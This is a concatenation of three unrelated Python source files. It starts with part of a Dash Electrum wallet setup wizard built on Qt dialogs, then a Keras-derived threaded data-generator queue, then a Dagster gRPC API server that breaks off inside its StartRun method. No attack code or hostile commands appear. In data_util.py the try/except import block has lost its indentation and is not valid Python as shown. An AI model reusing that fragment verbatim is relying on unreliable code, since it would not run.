        playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
        playout.encrypt_cb.setChecked(True)
        self.exec_layout(playout.layout())
        return playout.encrypt_cb.isChecked()
    @wizard_dialog
    def confirm_dialog(self, title, message, run_next):
        """Show a simple confirmation step (Next to continue)."""
        self.confirm(message, title)
    def confirm(self, message, title):
        """Display *message* and block until the user proceeds."""
        label = WWLabel(message)
        vbox = QVBoxLayout()
        vbox.addWidget(label)
        self.exec_layout(vbox, title)
    @wizard_dialog
    def action_dialog(self, action, run_next):
        """Run a named BaseWizard action as a wizard step."""
        self.run(action)
    def terminate(self, **kwargs):
        """Close the wizard from any thread via the accept signal."""
        self.accept_signal.emit()
    def waiting_dialog(self, task, msg, on_finished=None):
        """Run *task* in a thread while showing *msg*; pump the GUI meanwhile."""
        label = WWLabel(msg)
        vbox = QVBoxLayout()
        vbox.addSpacing(100)
        label.setMinimumWidth(300)
        label.setAlignment(Qt.AlignCenter)
        vbox.addWidget(label)
        self.set_layout(vbox, next_enabled=False)
        self.back_button.setEnabled(False)
        t = threading.Thread(target=task)
        t.start()
        while True:
            t.join(1.0/60)
            if t.is_alive():
                self.refresh_gui()
            else:
                break
        if on_finished:
            on_finished()
    @wizard_dialog
    def choice_dialog(self, title, message, choices, run_next):
        """Present (value, title) *choices*; return the selected value."""
        c_values = [x[0] for x in choices]
        c_titles = [x[1] for x in choices]
        clayout = ChoicesLayout(message, c_titles)
        vbox = QVBoxLayout()
        vbox.addLayout(clayout.layout())
        self.exec_layout(vbox, title)
        action = c_values[clayout.selected_index()]
        return action
    def query_choice(self, msg, choices):
        """called by hardware wallets"""
        clayout = ChoicesLayout(msg, choices)
        vbox = QVBoxLayout()
        vbox.addLayout(clayout.layout())
        self.exec_layout(vbox, '')
        return clayout.selected_index()
    @wizard_dialog
    def choice_and_line_dialog(self, title: str, message1: str, choices: List[Tuple[str, str, str]],
                               message2: str, test_text: Callable[[str], int],
                               run_next, default_choice_idx: int=0) -> Tuple[str, str]:
        """Combined radio-choice + text-entry step; return (text, choice value)."""
        vbox = QVBoxLayout()
        c_values = [x[0] for x in choices]
        c_titles = [x[1] for x in choices]
        c_default_text = [x[2] for x in choices]
        def on_choice_click(clayout):
            # Selecting a choice pre-fills the line with its default text.
            idx = clayout.selected_index()
            line.setText(c_default_text[idx])
        clayout = ChoicesLayout(message1, c_titles, on_choice_click,
                                checked_index=default_choice_idx)
        vbox.addLayout(clayout.layout())
        vbox.addSpacing(50)
        vbox.addWidget(WWLabel(message2))
        line = QLineEdit()
        def on_text_change(text):
            self.next_button.setEnabled(test_text(text))
        line.textEdited.connect(on_text_change)
        on_choice_click(clayout)  # set default text for "line"
        vbox.addWidget(line)
        self.exec_layout(vbox, title)
        choice = c_values[clayout.selected_index()]
        return str(line.text()), choice
    @wizard_dialog
    def line_dialog(self, run_next, title, message, default, test, warning='',
                    presets=(), warn_issue4566=False):
        """Single validated text-entry step with optional preset buttons."""
        vbox = QVBoxLayout()
        vbox.addWidget(WWLabel(message))
        line = QLineEdit()
        line.setText(default)
        def f(text):
            self.next_button.setEnabled(test(text))
            if warn_issue4566:
                # Warn about irregular whitespace in passphrases.
                text_whitespace_normalised = ' '.join(text.split())
                warn_issue4566_label.setVisible(text != text_whitespace_normalised)
        line.textEdited.connect(f)
        vbox.addWidget(line)
        vbox.addWidget(WWLabel(warning))
        warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
        warn_issue4566_label.setVisible(False)
        vbox.addWidget(warn_issue4566_label)
        for preset in presets:
            button = QPushButton(preset[0])
            button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
            button.setMinimumWidth(150)
            hbox = QHBoxLayout()
            hbox.addWidget(button, alignment=Qt.AlignCenter)
            vbox.addLayout(hbox)
        self.exec_layout(vbox, title, next_enabled=test(default))
        return line.text()
    @wizard_dialog
    def show_xpub_dialog(self, xpub, run_next):
        """Display the wallet's master public key for sharing with cosigners."""
        msg = ' '.join([
            _("Here is your master public key."),
            _("Please share it with your cosigners.")
        ])
        vbox = QVBoxLayout()
        layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
        vbox.addLayout(layout.layout())
        self.exec_layout(vbox, _('Master Public Key'))
        return None
    def init_network(self, network):
        """Ask how to connect to a server (auto vs. manual selection)."""
        message = _("Dash Electrum communicates with remote servers to get "
                    "information about your transactions and addresses. The "
                    "servers all fulfill the same purpose only differing in "
                    "hardware. In most cases you simply want to let Dash Electrum "
                    "pick one at random. However if you prefer feel free to "
                    "select a server manually.")
        choices = [_("Auto connect"), _("Select server manually")]
        title = _("How do you want to connect to a server? ")
        clayout = ChoicesLayout(message, choices)
        self.back_button.setText(_('Cancel'))
        self.exec_layout(clayout.layout(), title)
        r = clayout.selected_index()
        if r == 1:
            nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
            if self.exec_layout(nlayout.layout()):
                nlayout.accept()
        else:
            network.auto_connect = True
            self.config.set_key('auto_connect', True, True)
    @wizard_dialog
    def multisig_dialog(self, run_next):
        """Let the user pick an m-of-n multisig scheme; return (m, n)."""
        cw = CosignWidget(2, 2)
        m_edit = QSlider(Qt.Horizontal, self)
        n_edit = QSlider(Qt.Horizontal, self)
        n_edit.setMinimum(2)
        n_edit.setMaximum(15)
        m_edit.setMinimum(1)
        m_edit.setMaximum(2)
        n_edit.setValue(2)
        m_edit.setValue(2)
        n_label = QLabel()
        m_label = QLabel()
        grid = QGridLayout()
        grid.addWidget(n_label, 0, 0)
        grid.addWidget(n_edit, 0, 1)
        grid.addWidget(m_label, 1, 0)
        grid.addWidget(m_edit, 1, 1)
        def on_m(m):
            m_label.setText(_('Require {0} signatures').format(m))
            cw.set_m(m)
        def on_n(n):
            n_label.setText(_('From {0} cosigners').format(n))
            cw.set_n(n)
            # m can never exceed n.
            m_edit.setMaximum(n)
        n_edit.valueChanged.connect(on_n)
        m_edit.valueChanged.connect(on_m)
        on_n(2)
        on_m(2)
        vbox = QVBoxLayout()
        vbox.addWidget(cw)
        vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
        vbox.addLayout(grid)
        self.exec_layout(vbox, _("Multi-Signature Wallet"))
        m = int(m_edit.value())
        n = int(n_edit.value())
        return (m, n)
|
data_util.py | '''
this file is modified from keras implemention of data process multi-threading,
see https://github.com/fchollet/keras/blob/master/keras/utils/data_utils.py
'''
import time
import numpy as np
import threading
import multiprocessing
try:
import queue
except ImportError:
import Queue as queue
class GeneratorEnqueuer():
    """Builds a queue out of a data generator.
    Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
    # Arguments
        generator: a generator function which endlessly yields data
        use_multiprocessing: use multiprocessing if True, otherwise threading
        wait_time: time to sleep in-between calls to `put()`
        random_seed: Initial seed for workers,
            will be incremented by one for each workers.
    """
    def __init__(self, generator,
                 use_multiprocessing=False,
                 wait_time=0.05,
                 random_seed=None):
        self.wait_time = wait_time  # seconds to sleep when the queue is full
        self._generator = generator  # shared source generator
        self._use_multiprocessing = use_multiprocessing
        self._threads = []  # worker Thread/Process handles
        self._stop_event = None  # created in start(); set to request shutdown
        self.queue = None  # created in start()
        self.random_seed = random_seed
    def start(self, workers=1, max_queue_size=10):
        """Kicks off threads which add data from the generator into the queue.
        # Arguments
            workers: number of worker threads
            max_queue_size: queue size
                (when full, threads could block on `put()`)
        """
        def data_generator_task():
            # Worker loop: pull items until a stop is requested.
            while not self._stop_event.is_set():
                try:
                    # For multiprocessing the bounded Queue enforces the size
                    # limit itself; for threading we check qsize() by hand.
                    if self._use_multiprocessing or self.queue.qsize() < max_queue_size:
                        generator_output = next(self._generator)
                        self.queue.put(generator_output)
                    else:
                        time.sleep(self.wait_time)
                except Exception:
                    # Ask all workers to stop, then propagate the error.
                    self._stop_event.set()
                    raise
        try:
            if self._use_multiprocessing:
                self.queue = multiprocessing.Queue(maxsize=max_queue_size)
                self._stop_event = multiprocessing.Event()
            else:
                # NOTE(review): this Queue is unbounded; the qsize() check in
                # data_generator_task is the only size limit for threads.
                self.queue = queue.Queue()
                self._stop_event = threading.Event()
            for _ in range(workers):
                if self._use_multiprocessing:
                    # Reset random seed else all children processes
                    # share the same seed
                    np.random.seed(self.random_seed)
                    thread = multiprocessing.Process(target=data_generator_task)
                    thread.daemon = True
                    if self.random_seed is not None:
                        self.random_seed += 1
                else:
                    # NOTE(review): threading workers are not marked daemon --
                    # confirm whether they should outlive the main thread.
                    thread = threading.Thread(target=data_generator_task)
                self._threads.append(thread)
                thread.start()
        except:
            # Roll back any partially started workers before re-raising.
            self.stop()
            raise
    def is_running(self):
        """Return True while start() has run and stop was not requested."""
        return self._stop_event is not None and not self._stop_event.is_set()
    def stop(self, timeout=None):
        """Stops running threads and wait for them to exit, if necessary.
        Should be called by the same thread which called `start()`.
        # Arguments
            timeout: maximum time to wait on `thread.join()`.
        """
        if self.is_running():
            self._stop_event.set()
        for thread in self._threads:
            if thread.is_alive():
                if self._use_multiprocessing:
                    thread.terminate()
                else:
                    thread.join(timeout)
        if self._use_multiprocessing:
            if self.queue is not None:
                self.queue.close()
        # Reset so the enqueuer can be started again.
        self._threads = []
        self._stop_event = None
        self.queue = None
    def get(self):
        """Creates a generator to extract data from the queue.
        Skip the data if it is `None`.
        # Returns
            A generator
        """
        while self.is_running():
            if not self.queue.empty():
                inputs = self.queue.get()
                if inputs is not None:
                    yield inputs
            else:
                time.sleep(self.wait_time)
server.py | import math
import multiprocessing
import os
import queue
import sys
import threading
import time
import uuid
from collections import namedtuple
from concurrent.futures import ThreadPoolExecutor
from threading import Event as ThreadingEventType
from time import sleep
from typing import NamedTuple
import grpc
from grpc_health.v1 import health, health_pb2, health_pb2_grpc
from dagster import check, seven
from dagster.core.code_pointer import CodePointer
from dagster.core.definitions.reconstructable import ReconstructableRepository
from dagster.core.errors import DagsterUserCodeUnreachableError
from dagster.core.host_representation.external_data import external_repository_data_from_def
from dagster.core.host_representation.origin import ExternalPipelineOrigin, ExternalRepositoryOrigin
from dagster.core.instance import DagsterInstance
from dagster.core.origin import DEFAULT_DAGSTER_ENTRY_POINT, get_python_environment_entry_point
from dagster.core.types.loadable_target_origin import LoadableTargetOrigin
from dagster.serdes import (
deserialize_json_to_dagster_namedtuple,
serialize_dagster_namedtuple,
whitelist_for_serdes,
)
from dagster.serdes.ipc import IPCErrorMessage, ipc_write_stream, open_ipc_subprocess
from dagster.utils import find_free_port, frozenlist, safe_tempfile_path_unmanaged
from dagster.utils.error import SerializableErrorInfo, serializable_error_info_from_exc_info
from .__generated__ import api_pb2
from .__generated__.api_pb2_grpc import DagsterApiServicer, add_DagsterApiServicer_to_server
from .impl import (
RunInSubprocessComplete,
StartRunInSubprocessSuccessful,
get_external_execution_plan_snapshot,
get_external_pipeline_subset_result,
get_external_schedule_execution,
get_external_sensor_execution,
get_notebook_data,
get_partition_config,
get_partition_names,
get_partition_set_execution_param_data,
get_partition_tags,
start_run_in_subprocess,
)
from .types import (
CanCancelExecutionRequest,
CanCancelExecutionResult,
CancelExecutionRequest,
CancelExecutionResult,
ExecuteExternalPipelineArgs,
ExecutionPlanSnapshotArgs,
ExternalScheduleExecutionArgs,
GetCurrentImageResult,
ListRepositoriesResponse,
LoadableRepositorySymbol,
PartitionArgs,
PartitionNamesArgs,
PartitionSetExecutionParamArgs,
PipelineSubsetSnapshotArgs,
SensorExecutionArgs,
ShutdownServerResult,
StartRunResult,
)
from .utils import get_loadable_targets, max_rx_bytes, max_send_bytes
# Seconds between polls of the subprocess event queue in StartRun.
EVENT_QUEUE_POLL_INTERVAL = 0.1
# Seconds between orphaned-run sweeps in the cleanup thread.
CLEANUP_TICK = 0.5
# Maximum payload size (bytes) per streamed gRPC chunk event.
STREAMING_CHUNK_SIZE = 4000000
class CouldNotBindGrpcServerToAddress(Exception):
    """Raised when the gRPC server fails to bind to the requested port or Unix socket."""

    pass
class LoadedRepositories:
    """Eagerly loads every repository reachable from a LoadableTargetOrigin.

    For each loadable target, records the code pointer, the
    ReconstructableRepository, and the symbol metadata that
    `ListRepositories` reports to clients.
    """

    def __init__(self, loadable_target_origin, entry_point):
        self._loadable_target_origin = loadable_target_origin
        self._code_pointers_by_repo_name = {}
        self._recon_repos_by_name = {}
        self._loadable_repository_symbols = []
        if not loadable_target_origin:
            # Server was started without a target; nothing to load.
            return
        targets = get_loadable_targets(
            loadable_target_origin.python_file,
            loadable_target_origin.module_name,
            loadable_target_origin.package_name,
            loadable_target_origin.working_directory,
            loadable_target_origin.attribute,
        )
        for target in targets:
            code_pointer = _get_code_pointer(loadable_target_origin, target)
            reconstructable = ReconstructableRepository(
                code_pointer,
                _get_current_image(),
                sys.executable,
                entry_point=entry_point,
            )
            definition = reconstructable.get_definition()
            # force load of all lazy constructed jobs/pipelines
            definition.get_all_pipelines()
            repo_name = definition.name
            self._code_pointers_by_repo_name[repo_name] = code_pointer
            self._recon_repos_by_name[repo_name] = reconstructable
            self._loadable_repository_symbols.append(
                LoadableRepositorySymbol(
                    attribute=target.attribute,
                    repository_name=repo_name,
                )
            )

    @property
    def loadable_repository_symbols(self):
        """Symbols for every loaded repository, for ListRepositories replies."""
        return self._loadable_repository_symbols

    @property
    def code_pointers_by_repo_name(self):
        """Mapping of repository name to its CodePointer."""
        return self._code_pointers_by_repo_name

    def get_recon_repo(self, name: str) -> ReconstructableRepository:
        """Look up a loaded repository by name (KeyError if absent)."""
        return self._recon_repos_by_name[name]
def _get_code_pointer(loadable_target_origin, loadable_repository_symbol):
    """Build a CodePointer for a repository symbol.

    Prefers a python-file origin, then a package, falling back to a module.
    """
    attribute = loadable_repository_symbol.attribute
    working_directory = loadable_target_origin.working_directory
    if loadable_target_origin.python_file:
        return CodePointer.from_python_file(
            loadable_target_origin.python_file, attribute, working_directory
        )
    if loadable_target_origin.package_name:
        return CodePointer.from_python_package(
            loadable_target_origin.package_name, attribute, working_directory
        )
    return CodePointer.from_module(
        loadable_target_origin.module_name, attribute, working_directory
    )
class DagsterApiServer(DagsterApiServicer):
    """gRPC servicer implementing the Dagster user-code API.

    Serves repository metadata, partition/schedule/sensor evaluation, and
    run launching. Runs execute in spawned subprocesses tracked in
    `self._executions`; background threads watch for heartbeats and
    orphaned runs.

    Fixes in this revision:
    - `entry_point != None` -> `entry_point is not None` (identity check).
    - bare `except:` clauses in ShutdownServer/CancelExecution/StartRun
      narrowed to `except Exception:` so KeyboardInterrupt/SystemExit are
      no longer swallowed into RPC error replies.
    """

    # The loadable_target_origin is currently Noneable to support instantiating a server.
    # This helps us test the ping methods, and incrementally migrate each method to
    # the target passed in here instead of passing in a target in the argument.
    def __init__(
        self,
        server_termination_event,
        loadable_target_origin=None,
        heartbeat=False,
        heartbeat_timeout=30,
        lazy_load_user_code=False,
        fixed_server_id=None,
        entry_point=None,
    ):
        """Initialize the servicer, load user code, and start watcher threads.

        Arguments:
            server_termination_event: threading.Event set when the server should stop.
            loadable_target_origin: optional origin describing user code to load.
            heartbeat: if True, shut down when heartbeats stop arriving.
            heartbeat_timeout: seconds without a heartbeat before shutdown (> 0).
            lazy_load_user_code: if True, defer load errors to ListRepositories.
            fixed_server_id: optional stable server id (default: random UUID).
            entry_point: optional CLI entry point list used to reconstruct repos.
        """
        super(DagsterApiServer, self).__init__()
        check.bool_param(heartbeat, "heartbeat")
        check.int_param(heartbeat_timeout, "heartbeat_timeout")
        check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
        self._server_termination_event = check.inst_param(
            server_termination_event, "server_termination_event", ThreadingEventType
        )
        self._loadable_target_origin = check.opt_inst_param(
            loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
        )
        # "spawn" avoids forking the process hosting the gRPC server.
        self._mp_ctx = multiprocessing.get_context("spawn")
        # Each server is initialized with a unique UUID. This UUID is used by clients to track when
        # servers are replaced and is used for cache invalidation and reloading.
        self._server_id = check.opt_str_param(fixed_server_id, "fixed_server_id", str(uuid.uuid4()))
        # Client tells the server to shutdown by calling ShutdownServer (or by failing to send a
        # heartbeat, at which point this event is set. The cleanup thread will then set the server
        # termination event once all current executions have finished, which will stop the server)
        self._shutdown_once_executions_finish_event = threading.Event()
        # Dict[str, (multiprocessing.Process, InstanceRef)] -- StartRun stores
        # execute_run_args.instance_ref as the second member.
        self._executions = {}
        # Dict[str, multiprocessing.Event]
        self._termination_events = {}
        self._termination_times = {}
        self._execution_lock = threading.Lock()
        self._serializable_load_error = None
        self._entry_point = (
            frozenlist(check.list_param(entry_point, "entry_point", of_type=str))
            if entry_point is not None
            else DEFAULT_DAGSTER_ENTRY_POINT
        )
        try:
            self._loaded_repositories = LoadedRepositories(
                loadable_target_origin, self._entry_point
            )
        except Exception:
            if not lazy_load_user_code:
                raise
            # Defer the error so ListRepositories can report it to clients.
            self._loaded_repositories = None
            self._serializable_load_error = serializable_error_info_from_exc_info(sys.exc_info())
        self.__last_heartbeat_time = time.time()
        if heartbeat:
            self.__heartbeat_thread = threading.Thread(
                target=self._heartbeat_thread,
                args=(heartbeat_timeout,),
                name="grpc-server-heartbeat",
            )
            self.__heartbeat_thread.daemon = True
            self.__heartbeat_thread.start()
        else:
            self.__heartbeat_thread = None
        self.__cleanup_thread = threading.Thread(
            target=self._cleanup_thread, args=(), name="grpc-server-cleanup"
        )
        self.__cleanup_thread.daemon = True
        self.__cleanup_thread.start()

    def cleanup(self):
        """Join the watcher threads; call after the server has terminated."""
        if self.__heartbeat_thread:
            self.__heartbeat_thread.join()
        self.__cleanup_thread.join()

    def _heartbeat_thread(self, heartbeat_timeout):
        """Request shutdown if no Heartbeat RPC arrives within `heartbeat_timeout`."""
        while True:
            self._shutdown_once_executions_finish_event.wait(heartbeat_timeout)
            if self._shutdown_once_executions_finish_event.is_set():
                break
            if self.__last_heartbeat_time < time.time() - heartbeat_timeout:
                self._shutdown_once_executions_finish_event.set()

    def _cleanup_thread(self):
        """Periodically sweep for dead run subprocesses until termination."""
        while True:
            self._server_termination_event.wait(CLEANUP_TICK)
            if self._server_termination_event.is_set():
                break
            self._check_for_orphaned_runs()

    def _check_for_orphaned_runs(self):
        """Mark runs whose subprocess died as failed and clear them.

        Also terminates the server once a shutdown has been requested and no
        executions remain.
        """
        with self._execution_lock:
            runs_to_clear = []
            for run_id, (process, instance_ref) in self._executions.items():
                if not process.is_alive():
                    with DagsterInstance.from_ref(instance_ref) as instance:
                        runs_to_clear.append(run_id)
                        run = instance.get_run_by_id(run_id)
                        if not run or run.is_finished:
                            continue
                        # the process died in an unexpected manner. inform the system
                        message = (
                            f"Run execution process for {run.run_id} unexpectedly "
                            f"exited with exit code {process.exitcode}."
                        )
                        instance.report_engine_event(message, run, cls=self.__class__)
                        instance.report_run_failed(run)
            for run_id in runs_to_clear:
                self._clear_run(run_id)
            # Once there are no more running executions after we have received a request to
            # shut down, terminate the server
            if self._shutdown_once_executions_finish_event.is_set():
                if len(self._executions) == 0:
                    self._server_termination_event.set()

    # Assumes execution lock is being held
    def _clear_run(self, run_id):
        """Drop all tracking state for `run_id` (caller holds the lock)."""
        del self._executions[run_id]
        del self._termination_events[run_id]
        if run_id in self._termination_times:
            del self._termination_times[run_id]

    def _recon_repository_from_origin(
        self, external_repository_origin: ExternalRepositoryOrigin
    ) -> ReconstructableRepository:
        """Resolve a repository origin against the loaded repositories."""
        # could assert against external_repository_origin.repository_location_origin
        return self._loaded_repositories.get_recon_repo(external_repository_origin.repository_name)

    def _recon_pipeline_from_origin(self, external_pipeline_origin: ExternalPipelineOrigin):
        """Resolve a pipeline origin to a reconstructable pipeline."""
        recon_repo = self._recon_repository_from_origin(
            external_pipeline_origin.external_repository_origin
        )
        return recon_repo.get_reconstructable_pipeline(external_pipeline_origin.pipeline_name)

    def Ping(self, request, _context):
        """Echo the request back; liveness probe."""
        echo = request.echo
        return api_pb2.PingReply(echo=echo)

    def StreamingPing(self, request, _context):
        """Stream `sequence_length` echo events; streaming liveness probe."""
        sequence_length = request.sequence_length
        echo = request.echo
        for sequence_number in range(sequence_length):
            yield api_pb2.StreamingPingEvent(sequence_number=sequence_number, echo=echo)

    def Heartbeat(self, request, _context):
        """Record a client heartbeat (resets the heartbeat shutdown timer)."""
        self.__last_heartbeat_time = time.time()
        echo = request.echo
        return api_pb2.PingReply(echo=echo)

    def GetServerId(self, _request, _context):
        """Return this server's unique id (for client cache invalidation)."""
        return api_pb2.GetServerIdReply(server_id=self._server_id)

    def ExecutionPlanSnapshot(self, request, _context):
        """Compute and return a serialized execution plan snapshot."""
        execution_plan_args = deserialize_json_to_dagster_namedtuple(
            request.serialized_execution_plan_snapshot_args
        )
        check.inst_param(execution_plan_args, "execution_plan_args", ExecutionPlanSnapshotArgs)
        recon_pipeline = self._recon_pipeline_from_origin(execution_plan_args.pipeline_origin)
        execution_plan_snapshot_or_error = get_external_execution_plan_snapshot(
            recon_pipeline, execution_plan_args
        )
        return api_pb2.ExecutionPlanSnapshotReply(
            serialized_execution_plan_snapshot=serialize_dagster_namedtuple(
                execution_plan_snapshot_or_error
            )
        )

    def ListRepositories(self, request, _context):
        """List loaded repositories, or report the deferred load error."""
        if self._serializable_load_error:
            return api_pb2.ListRepositoriesReply(
                serialized_list_repositories_response_or_error=serialize_dagster_namedtuple(
                    self._serializable_load_error
                )
            )
        response = ListRepositoriesResponse(
            self._loaded_repositories.loadable_repository_symbols,
            executable_path=self._loadable_target_origin.executable_path
            if self._loadable_target_origin
            else None,
            repository_code_pointer_dict=self._loaded_repositories.code_pointers_by_repo_name,
            entry_point=self._entry_point,
        )
        return api_pb2.ListRepositoriesReply(
            serialized_list_repositories_response_or_error=serialize_dagster_namedtuple(response)
        )

    def ExternalPartitionNames(self, request, _context):
        """Return the partition names for a partition set."""
        partition_names_args = deserialize_json_to_dagster_namedtuple(
            request.serialized_partition_names_args
        )
        check.inst_param(partition_names_args, "partition_names_args", PartitionNamesArgs)
        recon_repo = self._recon_repository_from_origin(partition_names_args.repository_origin)
        return api_pb2.ExternalPartitionNamesReply(
            serialized_external_partition_names_or_external_partition_execution_error=serialize_dagster_namedtuple(
                get_partition_names(
                    recon_repo,
                    partition_names_args.partition_set_name,
                )
            )
        )

    def ExternalNotebookData(self, request, _context):
        """Return the raw content of a notebook file."""
        notebook_path = request.notebook_path
        check.str_param(notebook_path, "notebook_path")
        return api_pb2.ExternalNotebookDataReply(content=get_notebook_data(notebook_path))

    def ExternalPartitionSetExecutionParams(self, request, _context):
        """Stream serialized execution params for a set of partitions."""
        args = deserialize_json_to_dagster_namedtuple(
            request.serialized_partition_set_execution_param_args
        )
        check.inst_param(
            args,
            "args",
            PartitionSetExecutionParamArgs,
        )
        recon_repo = self._recon_repository_from_origin(args.repository_origin)
        serialized_data = serialize_dagster_namedtuple(
            get_partition_set_execution_param_data(
                recon_repo=recon_repo,
                partition_set_name=args.partition_set_name,
                partition_names=args.partition_names,
            )
        )
        yield from self._split_serialized_data_into_chunk_events(serialized_data)

    def ExternalPartitionConfig(self, request, _context):
        """Return the run config for a single partition."""
        args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
        check.inst_param(args, "args", PartitionArgs)
        recon_repo = self._recon_repository_from_origin(args.repository_origin)
        return api_pb2.ExternalPartitionConfigReply(
            serialized_external_partition_config_or_external_partition_execution_error=serialize_dagster_namedtuple(
                get_partition_config(recon_repo, args.partition_set_name, args.partition_name)
            )
        )

    def ExternalPartitionTags(self, request, _context):
        """Return the tags for a single partition."""
        partition_args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
        check.inst_param(partition_args, "partition_args", PartitionArgs)
        recon_repo = self._recon_repository_from_origin(partition_args.repository_origin)
        return api_pb2.ExternalPartitionTagsReply(
            serialized_external_partition_tags_or_external_partition_execution_error=serialize_dagster_namedtuple(
                get_partition_tags(
                    recon_repo, partition_args.partition_set_name, partition_args.partition_name
                )
            )
        )

    def ExternalPipelineSubsetSnapshot(self, request, _context):
        """Return a snapshot of a pipeline restricted to a solid selection."""
        pipeline_subset_snapshot_args = deserialize_json_to_dagster_namedtuple(
            request.serialized_pipeline_subset_snapshot_args
        )
        check.inst_param(
            pipeline_subset_snapshot_args,
            "pipeline_subset_snapshot_args",
            PipelineSubsetSnapshotArgs,
        )
        return api_pb2.ExternalPipelineSubsetSnapshotReply(
            serialized_external_pipeline_subset_result=serialize_dagster_namedtuple(
                get_external_pipeline_subset_result(
                    self._recon_pipeline_from_origin(pipeline_subset_snapshot_args.pipeline_origin),
                    pipeline_subset_snapshot_args.solid_selection,
                )
            )
        )

    def _get_serialized_external_repository_data(self, request):
        """Serialize the full external repository data for a repository origin."""
        repository_origin = deserialize_json_to_dagster_namedtuple(
            request.serialized_repository_python_origin
        )
        check.inst_param(repository_origin, "repository_origin", ExternalRepositoryOrigin)
        recon_repo = self._recon_repository_from_origin(repository_origin)
        return serialize_dagster_namedtuple(
            external_repository_data_from_def(recon_repo.get_definition())
        )

    def ExternalRepository(self, request, _context):
        """Return repository data in a single (possibly large) reply."""
        serialized_external_repository_data = self._get_serialized_external_repository_data(request)
        return api_pb2.ExternalRepositoryReply(
            serialized_external_repository_data=serialized_external_repository_data,
        )

    def StreamingExternalRepository(self, request, _context):
        """Stream repository data in STREAMING_CHUNK_SIZE pieces.

        Duplicates the chunking in _split_serialized_data_into_chunk_events
        because this RPC uses a different event message type.
        """
        serialized_external_repository_data = self._get_serialized_external_repository_data(request)
        num_chunks = int(
            math.ceil(float(len(serialized_external_repository_data)) / STREAMING_CHUNK_SIZE)
        )
        for i in range(num_chunks):
            start_index = i * STREAMING_CHUNK_SIZE
            end_index = min(
                (i + 1) * STREAMING_CHUNK_SIZE,
                len(serialized_external_repository_data),
            )
            yield api_pb2.StreamingExternalRepositoryEvent(
                sequence_number=i,
                serialized_external_repository_chunk=serialized_external_repository_data[
                    start_index:end_index
                ],
            )

    def _split_serialized_data_into_chunk_events(self, serialized_data):
        """Yield StreamingChunkEvents covering `serialized_data` in order."""
        num_chunks = int(math.ceil(float(len(serialized_data)) / STREAMING_CHUNK_SIZE))
        for i in range(num_chunks):
            start_index = i * STREAMING_CHUNK_SIZE
            end_index = min(
                (i + 1) * STREAMING_CHUNK_SIZE,
                len(serialized_data),
            )
            yield api_pb2.StreamingChunkEvent(
                sequence_number=i,
                serialized_chunk=serialized_data[start_index:end_index],
            )

    def ExternalScheduleExecution(self, request, _context):
        """Evaluate a schedule tick and stream the serialized result."""
        args = deserialize_json_to_dagster_namedtuple(
            request.serialized_external_schedule_execution_args
        )
        check.inst_param(
            args,
            "args",
            ExternalScheduleExecutionArgs,
        )
        recon_repo = self._recon_repository_from_origin(args.repository_origin)
        serialized_schedule_data = serialize_dagster_namedtuple(
            get_external_schedule_execution(
                recon_repo,
                args.instance_ref,
                args.schedule_name,
                args.scheduled_execution_timestamp,
                args.scheduled_execution_timezone,
            )
        )
        yield from self._split_serialized_data_into_chunk_events(serialized_schedule_data)

    def ExternalSensorExecution(self, request, _context):
        """Evaluate a sensor tick and stream the serialized result."""
        args = deserialize_json_to_dagster_namedtuple(
            request.serialized_external_sensor_execution_args
        )
        check.inst_param(args, "args", SensorExecutionArgs)
        recon_repo = self._recon_repository_from_origin(args.repository_origin)
        serialized_sensor_data = serialize_dagster_namedtuple(
            get_external_sensor_execution(
                recon_repo,
                args.instance_ref,
                args.sensor_name,
                args.last_completion_time,
                args.last_run_key,
                args.cursor,
            )
        )
        yield from self._split_serialized_data_into_chunk_events(serialized_sensor_data)

    def ShutdownServer(self, request, _context):
        """Request a graceful shutdown once in-flight executions finish."""
        try:
            self._shutdown_once_executions_finish_event.set()
            return api_pb2.ShutdownServerReply(
                serialized_shutdown_server_result=serialize_dagster_namedtuple(
                    ShutdownServerResult(success=True, serializable_error_info=None)
                )
            )
        except Exception:
            return api_pb2.ShutdownServerReply(
                serialized_shutdown_server_result=serialize_dagster_namedtuple(
                    ShutdownServerResult(
                        success=False,
                        serializable_error_info=serializable_error_info_from_exc_info(
                            sys.exc_info()
                        ),
                    )
                )
            )

    def CancelExecution(self, request, _context):
        """Signal a running execution's termination event."""
        success = False
        message = None
        serializable_error_info = None
        try:
            cancel_execution_request = check.inst(
                deserialize_json_to_dagster_namedtuple(request.serialized_cancel_execution_request),
                CancelExecutionRequest,
            )
            with self._execution_lock:
                if cancel_execution_request.run_id in self._executions:
                    self._termination_events[cancel_execution_request.run_id].set()
                    self._termination_times[cancel_execution_request.run_id] = time.time()
                    success = True
        except Exception:
            serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
        return api_pb2.CancelExecutionReply(
            serialized_cancel_execution_result=serialize_dagster_namedtuple(
                CancelExecutionResult(
                    success=success,
                    message=message,
                    serializable_error_info=serializable_error_info,
                )
            )
        )

    def CanCancelExecution(self, request, _context):
        """Report whether a run is still active and not already cancelling."""
        can_cancel_execution_request = check.inst(
            deserialize_json_to_dagster_namedtuple(request.serialized_can_cancel_execution_request),
            CanCancelExecutionRequest,
        )
        with self._execution_lock:
            run_id = can_cancel_execution_request.run_id
            can_cancel = (
                run_id in self._executions and not self._termination_events[run_id].is_set()
            )
        return api_pb2.CanCancelExecutionReply(
            serialized_can_cancel_execution_result=serialize_dagster_namedtuple(
                CanCancelExecutionResult(can_cancel=can_cancel)
            )
        )

    def StartRun(self, request, _context):
        """Launch a run in a spawned subprocess and wait for it to start up."""
        if self._shutdown_once_executions_finish_event.is_set():
            return api_pb2.StartRunReply(
                serialized_start_run_result=serialize_dagster_namedtuple(
                    StartRunResult(
                        success=False,
                        message="Tried to start a run on a server after telling it to shut down",
                        serializable_error_info=None,
                    )
                )
            )
        try:
            execute_run_args = check.inst(
                deserialize_json_to_dagster_namedtuple(request.serialized_execute_run_args),
                ExecuteExternalPipelineArgs,
            )
